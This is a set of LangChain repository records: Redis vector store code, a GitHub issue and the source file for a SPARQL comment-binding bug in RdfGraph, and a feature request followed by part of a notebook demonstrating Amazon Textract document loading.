obtain beforehand because we don't # know which embedding model is being used. self._schema.content_vector.dims = dim # Check if index exists if not check_index_exists(self.client, self.index_name): prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=self._schema.get_fields(), definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) def _calculate_fp_distance(self, distance: str) -> float: """Calculate the distance based on the vector datatype Two datatypes supported: - FLOAT32 - FLOAT64 if it's FLOAT32, we need to round the distance to 4 decimal places otherwise, round to 7 decimal places. """ if self._schema.content_vector.datatype == "FLOAT32": return round(float(distance), 4) return round(float(distance), 7) def _check_deprecated_kwargs(self, kwargs: Mapping[str, Any]) -> None: """Check for deprecated kwargs.""" deprecated_kwargs = { "redis_host": "redis_url", "redis_port": "redis_url", "redis_password": "redis_url", "content_key": "index_schema", "vector_key": "vector_schema", "distance_metric": "vector_schema", } for key, value in kwargs.items(): if key in deprecated_kwargs: raise ValueError( f"Keyword argument '{key}' is deprecated. " f"Please use '{deprecated_kwargs[key]}' instead." 
) def _select_relevance_score_fn(self) -> Callable[[float], float]: if self.relevance_score_fn: return self.relevance_score_fn metric_map = { "COSINE": self._cosine_relevance_score_fn, "IP": self._max_inner_product_relevance_score_fn, "L2": self._euclidean_relevance_score_fn, } try: return metric_map[self._schema.content_vector.distance_metric] except KeyError: return _default_relevance_score def _generate_field_schema(data: Dict[str, Any]) -> Dict[str, Any]: """ Generate a schema for the search index in Redis based on the input metadata. Given a dictionary of metadata, this function categorizes each metadata field into one of the three categories: - text: The field contains textual data. - numeric: The field contains numeric data (either integer or float). - tag: The field contains list of tags (strings). Args data (Dict[str, Any]): A dictionary where keys are metadata field names and values are the metadata values. Returns: Dict[str, Any]: A dictionary with three keys "text", "numeric", and "tag". Each key maps to a list of fields that belong to that category. Raises: ValueError: If a metadata field cannot be categorized into any of the three known types. """ result: Dict[str, Any] = { "text": [], "numeric": [], "tag": [], } for key, value in data.items(): # Numeric fields try: int(value) result["numeric"].append({"name": key}) continue except (ValueError, TypeError): pass # None values are not indexed as of now if value is None: continue # if it's a list of strings, we assume it's a tag if isinstance(value, (list, tuple)): if not value or isinstance(value[0], str): result["tag"].append({"name": key}) else: name = type(value[0]).__name__ raise ValueError( f"List/tuple values should contain strings: '{key}': {name}" ) continue # Check if value is string before processing further if isinstance(value, str): result["text"].append({"name": key}) continue # Unable to classify the field value name = type(value).__name__ raise ValueError( "Could not generate Redis index field type mapping " + f"for metadata: '{key}': {name}" ) return result def _prepare_metadata(metadata: Dict[str, Any]) -> Dict[str, Any]: """ Prepare metadata for indexing in Redis by sanitizing its values. - String, integer, and float values remain unchanged. - None or empty values are replaced with empty strings. - Lists/tuples of strings are joined into a single string with a comma separator. Args: metadata (Dict[str, Any]): A dictionary where keys are metadata field names and values are the metadata values. Returns: Dict[str, Any]: A sanitized dictionary ready for indexing in Redis. Raises: ValueError: If any metadata value is not one of the known types (string, int, float, or list of strings). """ def raise_error(key: str, value: Any) -> None: raise ValueError( f"Metadata value for key '{key}' must be a string, int, " + f"float, or list of strings. 
Got {type(value).__name__}" ) clean_meta: Dict[str, Union[str, float, int]] = {} for key, value in metadata.items(): if not value: clean_meta[key] = "" continue # No transformation needed if isinstance(value, (str, int, float)): clean_meta[key] = value # if it's a list/tuple of strings, we join it elif isinstance(value, (list, tuple)): if not value or isinstance(value[0], str): clean_meta[key] = REDIS_TAG_SEPARATOR.join(value) else: raise_error(key, value) else: raise_error(key, value) return clean_meta class RedisVectorStoreRetriever(VectorStoreRetriever): """Retriever for Redis VectorStore.""" vectorstore: Redis """Redis VectorStore.""" search_type: str = "similarity" """Type of search to perform. Can be either 'similarity', 'similarity_distance_threshold', 'similarity_score_threshold' """ search_kwargs: Dict[str, Any] = { "k": 4, "score_threshold": 0.9, # set to None to avoid distance used in score_threshold search "distance_threshold": None, } """Default search kwargs.""" allowed_search_types = [ "similarity", "similarity_distance_threshold", "similarity_score_threshold", "mmr", ] """Allowed search types.""" class Config: """Configuration for this pydantic object.""" arbitrary_types_allowed = True def _get_relevant_documents( self, query: str, *, run_manager: CallbackManagerForRetrieverRun ) -> List[Document]: if self.search_type == "similarity": docs = self.vectorstore.similarity_search(query, **self.search_kwargs) elif self.search_type == "similarity_distance_threshold": if self.search_kwargs["distance_threshold"] is None: raise ValueError( "distance_threshold must be provided for " + "similarity_distance_threshold retriever" ) docs = self.vectorstore.similarity_search(query, **self.search_kwargs) elif self.search_type == "similarity_score_threshold": docs_and_similarities = ( self.vectorstore.similarity_search_with_relevance_scores( query, **self.search_kwargs ) ) docs = [doc for doc, _ in docs_and_similarities] elif self.search_type == "mmr": docs = self.vectorstore.max_marginal_relevance_search( query, **self.search_kwargs ) else: raise ValueError(f"search_type of {self.search_type} not allowed.") return docs async def _aget_relevant_documents( self, query: str, *, run_manager: AsyncCallbackManagerForRetrieverRun ) -> List[Document]: raise NotImplementedError("RedisVectorStoreRetriever does not support async") def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]: """Add documents to vectorstore.""" return self.vectorstore.add_documents(documents, **kwargs) async def aadd_documents( self, documents: List[Document], **kwargs: Any ) -> List[str]: """Add documents to vectorstore.""" return await self.vectorstore.aadd_documents(documents, **kwargs)
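# --- Illustrative usage sketch (not part of the library API): a minimal, hedged
# demonstration of how the module-level metadata helpers above behave. Only this
# module's own definitions are assumed; no Redis server is needed.
if __name__ == "__main__":
    sample_metadata = {"user": "alice", "age": 30, "tags": ["a", "b"], "note": None}
    # Strings map to text fields, ints/floats to numeric fields, and lists of
    # strings to tag fields; None values are skipped by the schema generator.
    print(_generate_field_schema(sample_metadata))
    # {'text': [{'name': 'user'}], 'numeric': [{'name': 'age'}], 'tag': [{'name': 'tags'}]}
    # Sanitization joins tag lists with REDIS_TAG_SEPARATOR and maps empty
    # values to empty strings before the hash is written.
    print(_prepare_metadata(sample_metadata))
    # {'user': 'alice', 'age': 30, 'tags': 'a,b', 'note': ''}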
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,907
RdfGraph schema retrieval queries for the relation types are not linked by the correct comment variable
### System Info langchain = 0.0.251 Python = 3.10.11 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Create an OWL ontology called `dbpedia_sample.ttl` with the following: ``` turtle @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> . @prefix dcterms: <http://purl.org/dc/terms/> . @prefix wikidata: <http://www.wikidata.org/entity/> . @prefix owl: <http://www.w3.org/2002/07/owl#> . @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> . @prefix prov: <http://www.w3.org/ns/prov#> . @prefix : <http://dbpedia.org/ontology/> . :Actor a owl:Class ; rdfs:comment "An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity."@en ; rdfs:label "actor"@en ; rdfs:subClassOf :Artist ; owl:equivalentClass wikidata:Q33999 ; prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyClass:Actor> . :AdministrativeRegion a owl:Class ; rdfs:comment "A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration)"@en ; rdfs:label "administrative region"@en ; rdfs:subClassOf :Region ; owl:equivalentClass <http://schema.org/AdministrativeArea>, wikidata:Q3455524 ; prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyClass:AdministrativeRegion> . :birthPlace a rdf:Property, owl:ObjectProperty ; rdfs:comment "where the person was born"@en ; rdfs:domain :Animal ; rdfs:label "birth place"@en ; rdfs:range :Place ; rdfs:subPropertyOf dul:hasLocation ; owl:equivalentProperty <http://schema.org/birthPlace>, wikidata:P19 ; prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyProperty:birthPlace> . ``` 2. Run ``` python from langchain.graphs import RdfGraph graph = RdfGraph( source_file="dbpedia_sample.ttl", serialization="ttl", standard="owl" ) print(graph.get_schema) ``` 3. Output ``` In the following, each IRI is followed by the local name and optionally its description in parentheses. The OWL graph supports the following node types: <http://dbpedia.org/ontology/Actor> (Actor, An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity.), <http://dbpedia.org/ontology/AdministrativeRegion> (AdministrativeRegion, A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration)) The OWL graph supports the following object properties, i.e., relationships between objects: <http://dbpedia.org/ontology/birthPlace> (birthPlace, An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity.), <http://dbpedia.org/ontology/birthPlace> (birthPlace, A PopulatedPlace under the jurisdiction of an administrative body. 
This body may administer either a whole region or one or more adjacent Settlements (town administration)), <http://dbpedia.org/ontology/birthPlace> (birthPlace, where the person was born) The OWL graph supports the following data properties, i.e., relationships between objects and literals: ``` ### Expected behavior The issue is that in the SPARQL queries that get the properties, the `rdfs:comment` triple pattern always refers to the variable `?cls`, which obviously comes from copy/paste code. For example, in the query for the RDF properties ``` python rel_query_rdf = prefixes["rdfs"] + ( """SELECT DISTINCT ?rel ?com\n""" """WHERE { \n""" """ ?subj ?rel ?obj . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ``` you can see that the `OPTIONAL` clause refers to `?cls`, but it should be `?rel`. The same holds for all other queries regarding properties. As it stands, the queries produce a cartesian product of the properties and all `rdfs:comment` values in the dataset, which can be horribly large and of course leads to misleading and huge prompts (see the output of my sample in the "reproduction" part).
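For reference, a corrected version of that query would bind the comment to the property variable (the RDFS and OWL variants need the analogous change to `?rel`, `?op`, and `?dp` respectively):

``` python
rel_query_rdf = prefixes["rdfs"] + (
    """SELECT DISTINCT ?rel ?com\n"""
    """WHERE { \n"""
    """  ?subj ?rel ?obj . \n"""
    """  OPTIONAL { ?rel rdfs:comment ?com } \n"""
    """}"""
)
```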
https://github.com/langchain-ai/langchain/issues/8907
https://github.com/langchain-ai/langchain/pull/9136
d9f1bcf366b5a66021d246d8e9c56e76fe60ead1
cce132d1460b4f52541cb4a6f13219fb8fe4f907
"2023-08-08T10:57:54Z"
python
"2023-10-25T20:36:57Z"
libs/langchain/langchain/graphs/rdf_graph.py
from __future__ import annotations from typing import ( TYPE_CHECKING, List, Optional, ) if TYPE_CHECKING: import rdflib prefixes = { "owl": """PREFIX owl: <http://www.w3.org/2002/07/owl#>\n""", "rdf": """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\n""", "rdfs": """PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n""", "xsd": """PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\n""", } cls_query_rdf = prefixes["rdfs"] + ( """SELECT DISTINCT ?cls ?com\n""" """WHERE { \n""" """ ?instance a ?cls . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) cls_query_rdfs = prefixes["rdfs"] + ( """SELECT DISTINCT ?cls ?com\n""" """WHERE { \n""" """ ?instance a/rdfs:subClassOf* ?cls . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) cls_query_owl = prefixes["rdfs"] + ( """SELECT DISTINCT ?cls ?com\n""" """WHERE { \n""" """ ?instance a/rdfs:subClassOf* ?cls . \n""" """ FILTER (isIRI(?cls)) . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) rel_query_rdf = prefixes["rdfs"] + ( """SELECT DISTINCT ?rel ?com\n""" """WHERE { \n""" """ ?subj ?rel ?obj . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) rel_query_rdfs = ( prefixes["rdf"] + prefixes["rdfs"] + ( """SELECT DISTINCT ?rel ?com\n""" """WHERE { \n""" """ ?rel a/rdfs:subPropertyOf* rdf:Property . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ) op_query_owl = ( prefixes["rdfs"] + prefixes["owl"] + ( """SELECT DISTINCT ?op ?com\n""" """WHERE { \n""" """ ?op a/rdfs:subPropertyOf* owl:ObjectProperty . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ) dp_query_owl = ( prefixes["rdfs"] + prefixes["owl"] + ( """SELECT DISTINCT ?dp ?com\n""" """WHERE { \n""" """ ?dp a/rdfs:subPropertyOf* owl:DatatypeProperty . \n""" """ OPTIONAL { ?cls rdfs:comment ?com } \n""" """}""" ) ) class RdfGraph: """RDFlib wrapper for graph operations. Modes: * local: Local file - can be queried and changed * online: Online file - can only be queried, changes can be stored locally * store: Triple store - can be queried and changed if update_endpoint available Together with a source file, the serialization should be specified. *Security note*: Make sure that the database connection uses credentials that are narrowly-scoped to only include necessary permissions. Failure to do so may result in data corruption or loss, since the calling code may attempt commands that would result in deletion, mutation of data if appropriately prompted or reading sensitive data if such data is present in the database. The best way to guard against such negative outcomes is to (as appropriate) limit the permissions granted to the credentials used with this tool. See https://python.langchain.com/docs/security for more information. 
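Example (an illustrative sketch, assuming a local Turtle file named ``example.ttl``):

    from langchain.graphs import RdfGraph

    graph = RdfGraph(
        source_file="example.ttl",
        serialization="ttl",
        standard="rdfs",
    )
    print(graph.get_schema)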
""" def __init__( self, source_file: Optional[str] = None, serialization: Optional[str] = "ttl", query_endpoint: Optional[str] = None, update_endpoint: Optional[str] = None, standard: Optional[str] = "rdf", local_copy: Optional[str] = None, ) -> None: """ Set up the RDFlib graph :param source_file: either a path for a local file or a URL :param serialization: serialization of the input :param query_endpoint: SPARQL endpoint for queries, read access :param update_endpoint: SPARQL endpoint for UPDATE queries, write access :param standard: RDF, RDFS, or OWL :param local_copy: new local copy for storing changes """ self.source_file = source_file self.serialization = serialization self.query_endpoint = query_endpoint self.update_endpoint = update_endpoint self.standard = standard self.local_copy = local_copy try: import rdflib from rdflib.graph import DATASET_DEFAULT_GRAPH_ID as default from rdflib.plugins.stores import sparqlstore except ImportError: raise ValueError( "Could not import rdflib python package. " "Please install it with `pip install rdflib`." ) if self.standard not in (supported_standards := ("rdf", "rdfs", "owl")): raise ValueError( f"Invalid standard. Supported standards are: {supported_standards}." ) if ( not source_file and not query_endpoint or source_file and (query_endpoint or update_endpoint) ): raise ValueError( "Could not unambiguously initialize the graph wrapper. " "Specify either a file (local or online) via the source_file " "or a triple store via the endpoints." ) if source_file: if source_file.startswith("http"): self.mode = "online" else: self.mode = "local" if self.local_copy is None: self.local_copy = self.source_file self.graph = rdflib.Graph() self.graph.parse(source_file, format=self.serialization) if query_endpoint: self.mode = "store" if not update_endpoint: self._store = sparqlstore.SPARQLStore() self._store.open(query_endpoint) else: self._store = sparqlstore.SPARQLUpdateStore() self._store.open((query_endpoint, update_endpoint)) self.graph = rdflib.Graph(self._store, identifier=default) # Verify that the graph was loaded if not len(self.graph): raise AssertionError("The graph is empty.") # Set schema self.schema = "" self.load_schema() @property def get_schema(self) -> str: """ Returns the schema of the graph database. """ return self.schema def query( self, query: str, ) -> List[rdflib.query.ResultRow]: """ Query the graph. """ from rdflib.exceptions import ParserError from rdflib.query import ResultRow try: res = self.graph.query(query) except ParserError as e: raise ValueError("Generated SPARQL statement is invalid\n" f"{e}") return [r for r in res if isinstance(r, ResultRow)] def update( self, query: str, ) -> None: """ Update the graph. 
""" from rdflib.exceptions import ParserError try: self.graph.update(query) except ParserError as e: raise ValueError("Generated SPARQL statement is invalid\n" f"{e}") if self.local_copy: self.graph.serialize( destination=self.local_copy, format=self.local_copy.split(".")[-1] ) else: raise ValueError("No target file specified for saving the updated file.") @staticmethod def _get_local_name(iri: str) -> str: if "#" in iri: local_name = iri.split("#")[-1] elif "/" in iri: local_name = iri.split("/")[-1] else: raise ValueError(f"Unexpected IRI '{iri}', contains neither '#' nor '/'.") return local_name def _res_to_str(self, res: rdflib.query.ResultRow, var: str) -> str: return ( "<" + str(res[var]) + "> (" + self._get_local_name(res[var]) + ", " + str(res["com"]) + ")" ) def load_schema(self) -> None: """ Load the graph schema information. """ def _rdf_s_schema( classes: List[rdflib.query.ResultRow], relationships: List[rdflib.query.ResultRow], ) -> str: return ( f"In the following, each IRI is followed by the local name and " f"optionally its description in parentheses. \n" f"The RDF graph supports the following node types:\n" f'{", ".join([self._res_to_str(r, "cls") for r in classes])}\n' f"The RDF graph supports the following relationships:\n" f'{", ".join([self._res_to_str(r, "rel") for r in relationships])}\n' ) if self.standard == "rdf": clss = self.query(cls_query_rdf) rels = self.query(rel_query_rdf) self.schema = _rdf_s_schema(clss, rels) elif self.standard == "rdfs": clss = self.query(cls_query_rdfs) rels = self.query(rel_query_rdfs) self.schema = _rdf_s_schema(clss, rels) elif self.standard == "owl": clss = self.query(cls_query_owl) ops = self.query(op_query_owl) dps = self.query(dp_query_owl) self.schema = ( f"In the following, each IRI is followed by the local name and " f"optionally its description in parentheses. \n" f"The OWL graph supports the following node types:\n" f'{", ".join([self._res_to_str(r, "cls") for r in clss])}\n' f"The OWL graph supports the following object properties, " f"i.e., relationships between objects:\n" f'{", ".join([self._res_to_str(r, "op") for r in ops])}\n' f"The OWL graph supports the following data properties, " f"i.e., relationships between objects and literals:\n" f'{", ".join([self._res_to_str(r, "dp") for r in dps])}\n' ) else: raise ValueError(f"Mode '{self.standard}' is currently not supported.")
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies layout elements such as tables, lists, figures, text paragraphs, and titles. The AmazonTextractPDFParser should use this to generate a linearized text output, improving downstream LLM accuracy with those hints. When features like LAYOUT, TABLES, and FORMS are passed to the Textract call, the text output should render tables and key/value pairs, keep multi-column text in reading order, and prefix list items with a *. ### Motivation Improve downstream LLM accuracy. ### Your contribution I'll submit a PR for this feature.
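For illustration only, the user-facing call might look like the following sketch (the loader already accepts a `textract_features` list for TABLES/FORMS; treating `"LAYOUT"` as an accepted value, and the S3 path, are assumptions until the PR lands):

``` python
from langchain.document_loaders import AmazonTextractPDFLoader

# hypothetical: "LAYOUT" added alongside the existing feature flags
loader = AmazonTextractPDFLoader(
    "s3://my-bucket/multi-column-sample.pdf",  # placeholder document
    textract_features=["LAYOUT", "TABLES", "FORMS"],
)
documents = loader.load()  # page_content would then be linearized text
```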
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
docs/docs/integrations/document_loaders/pdf-amazonTextractPDFLoader.ipynb
{ "cells": [ { "cell_type": "markdown", "id": "1f3cebbe-079a-4bfe-b1a1-07bdac882ce2", "metadata": {}, "source": [ "# Amazon Textract \n", "\n", "Amazon Textract is a machine learning (ML) service that automatically extracts text, handwriting, and data from scanned documents. It goes beyond simple optical character recognition (OCR) to identify, understand, and extract data from forms and tables. Today, many companies manually extract data from scanned documents such as PDFs, images, tables, and forms, or through simple OCR software that requires manual configuration (which often must be updated when the form changes). To overcome these manual and expensive processes, Textract uses ML to read and process any type of document, accurately extracting text, handwriting, tables, and other data with no manual effort. You can quickly automate document processing and act on the information extracted, whether you’re automating loans processing or extracting information from invoices and receipts. Textract can extract the data in minutes instead of hours or days.\n", "\n", "This sample demonstrates the use of Amazon Textract in combination with LangChain as a DocumentLoader.\n", "\n", "Textract supports PDF, TIFF, PNG and JPEG format.\n", "\n", "Check https://docs.aws.amazon.com/textract/latest/dg/limits-document.html for supported document sizes, languages and characters." ] }, { "cell_type": "code", "execution_count": 1, "id": "c049beaf-f904-4ce6-91ca-805da62084c2", "metadata": { "tags": [] }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "\n", "\u001b[1m[\u001b[0m\u001b[34;49mnotice\u001b[0m\u001b[1;39;49m]\u001b[0m\u001b[39;49m A new release of pip is available: \u001b[0m\u001b[31;49m23.2\u001b[0m\u001b[39;49m -> \u001b[0m\u001b[32;49m23.2.1\u001b[0m\n", "\u001b[1m[\u001b[0m\u001b[34;49mnotice\u001b[0m\u001b[1;39;49m]\u001b[0m\u001b[39;49m To update, run: \u001b[0m\u001b[32;49mpython -m pip install --upgrade pip\u001b[0m\n" ] } ], "source": [ "!pip install langchain boto3 openai tiktoken python-dotenv -q" ] }, { "cell_type": "markdown", "id": "400b25c6-befa-4730-a201-39ff112c8858", "metadata": {}, "source": [ "## Sample 1\n", "\n", "The first example uses a local file, which internally will be send to Amazon Textract sync API [DetectDocumentText](https://docs.aws.amazon.com/textract/latest/dg/API_DetectDocumentText.html). \n", "\n", "Local files or URL endpoints like HTTP:// are limited to one page documents for Textract.\n", "Multi-page documents have to reside on S3. This sample file is a jpeg." 
] }, { "cell_type": "code", "execution_count": 9, "id": "1becee92-e82f-42d4-9b4e-b23d77cbe88d", "metadata": { "tags": [] }, "outputs": [], "source": [ "from langchain.document_loaders import AmazonTextractPDFLoader\n", "\n", "loader = AmazonTextractPDFLoader(\"example_data/alejandro_rosalez_sample-small.jpeg\")\n", "documents = loader.load()" ] }, { "cell_type": "markdown", "id": "d566dc56-c9a9-44ec-84fb-a81928f90d40", "metadata": {}, "source": [ "Output from the file" ] }, { "cell_type": "code", "execution_count": 10, "id": "1272ce8c-d298-4059-ac0a-780bf5f82302", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No ', metadata={'source': 'example_data/alejandro_rosalez_sample-small.jpeg', 'page': 1})]" ] }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "source": [ "documents" ] }, { "cell_type": "markdown", "id": "4cf7f19c-3635-453a-9c76-4baf98b8d7f4", "metadata": {}, "source": [ "## Sample 2\n", "The next sample loads a file from an HTTPS endpoint. \n", "It has to be single page, as Amazon Textract requires all multi-page documents to be stored on S3." 
] }, { "cell_type": "code", "execution_count": 7, "id": "10374bfb-b325-451f-8bd0-c686710ab68c", "metadata": { "tags": [] }, "outputs": [], "source": [ "from langchain.document_loaders import AmazonTextractPDFLoader\n", "\n", "loader = AmazonTextractPDFLoader(\n", " \"https://amazon-textract-public-content.s3.us-east-2.amazonaws.com/langchain/alejandro_rosalez_sample_1.jpg\"\n", ")\n", "documents = loader.load()" ] }, { "cell_type": "code", "execution_count": 11, "id": "16a2b6a3-7514-4c2c-a427-6847169af473", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "[Document(page_content='Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No ', metadata={'source': 'example_data/alejandro_rosalez_sample-small.jpeg', 'page': 1})]" ] }, "execution_count": 11, "metadata": {}, "output_type": "execute_result" } ], "source": [ "documents" ] }, { "cell_type": "markdown", "id": "3a9cd8ec-e663-4dc7-9db1-d2f575253141", "metadata": {}, "source": [ "## Sample 3\n", "\n", "Processing a multi-page document requires the document to be on S3. The sample document resides in a bucket in us-east-2 and Textract needs to be called in that same region to be successful, so we set the region_name on the client and pass that in to the loader to ensure Textract is called from us-east-2. You could also to have your notebook running in us-east-2, setting the AWS_DEFAULT_REGION set to us-east-2 or when running in a different environment, pass in a boto3 Textract client with that region name like in the cell below." 
] }, { "cell_type": "code", "execution_count": 12, "id": "8185e3e6-9599-4a47-8969-d6dcef3e6404", "metadata": { "tags": [] }, "outputs": [], "source": [ "import boto3\n", "\n", "textract_client = boto3.client(\"textract\", region_name=\"us-east-2\")\n", "\n", "file_path = \"s3://amazon-textract-public-content/langchain/layout-parser-paper.pdf\"\n", "loader = AmazonTextractPDFLoader(file_path, client=textract_client)\n", "documents = loader.load()" ] }, { "cell_type": "markdown", "id": "b8901eec-070d-4fd6-9d65-52211d332441", "metadata": {}, "source": [ "Now getting the number of pages to validate the response (printing out the full response would be quite long...). We expect 16 pages." ] }, { "cell_type": "code", "execution_count": 13, "id": "b23c01c8-cf69-4fe2-8141-4621edb7d79c", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "16" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "len(documents)" ] }, { "cell_type": "markdown", "id": "b3e41b4d-b159-4274-89be-80d8159134ef", "metadata": {}, "source": [ "## Using the AmazonTextractPDFLoader in an LangChain chain (e. g. OpenAI)\n", "\n", "The AmazonTextractPDFLoader can be used in a chain the same way the other loaders are used.\n", "Textract itself does have a [Query feature](https://docs.aws.amazon.com/textract/latest/dg/API_Query.html), which offers similar functionality to the QA chain in this sample, which is worth checking out as well." ] }, { "cell_type": "code", "execution_count": 14, "id": "53c47b24-cc06-4256-9e5b-a82fc80bc55d", "metadata": {}, "outputs": [], "source": [ "# You can store your OPENAI_API_KEY in a .env file as well\n", "# import os\n", "# from dotenv import load_dotenv\n", "\n", "# load_dotenv()" ] }, { "cell_type": "code", "execution_count": 15, "id": "a9ae004c-246c-4c7f-8458-191cd7424a9b", "metadata": { "tags": [] }, "outputs": [], "source": [ "# Or set the OpenAI key in the environment directly\n", "import os\n", "\n", "os.environ[\"OPENAI_API_KEY\"] = \"your-OpenAI-API-key\"" ] }, { "cell_type": "code", "execution_count": 16, "id": "d52b089c-10ca-45fb-8669-8a1c5fee10d5", "metadata": { "tags": [] }, "outputs": [ { "data": { "text/plain": [ "' The authors are Zejiang Shen, Ruochen Zhang, Melissa Dell, Benjamin Charles Germain Lee, Jacob Carlson, Weining Li, Gardner, M., Grus, J., Neumann, M., Tafjord, O., Dasigi, P., Liu, N., Peters, M., Schmitz, M., Zettlemoyer, L., Lukasz Garncarek, Powalski, R., Stanislawek, T., Topolski, B., Halama, P., Gralinski, F., Graves, A., Fernández, S., Gomez, F., Schmidhuber, J., Harley, A.W., Ufkes, A., Derpanis, K.G., He, K., Gkioxari, G., Dollár, P., Girshick, R., He, K., Zhang, X., Ren, S., Sun, J., Kay, A., Lamiroy, B., Lopresti, D., Mears, J., Jakeway, E., Ferriter, M., Adams, C., Yarasavage, N., Thomas, D., Zwaard, K., Li, M., Cui, L., Huang,'" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "from langchain.llms import OpenAI\n", "from langchain.chains.question_answering import load_qa_chain\n", "\n", "chain = load_qa_chain(llm=OpenAI(), chain_type=\"map_reduce\")\n", "query = [\"Who are the autors?\"]\n", "\n", "chain.run(input_documents=documents, question=query)" ] }, { "cell_type": "code", "execution_count": null, "id": "1a09d18b-ab7b-468e-ae66-f92abf666b9b", "metadata": {}, "outputs": [], "source": [] } ], "metadata": { "availableInstances": [ { "_defaultOrder": 0, "_isFastLaunch": true, "category": "General purpose", "gpuNum": 0, "hideHardwareSpecs": false, 
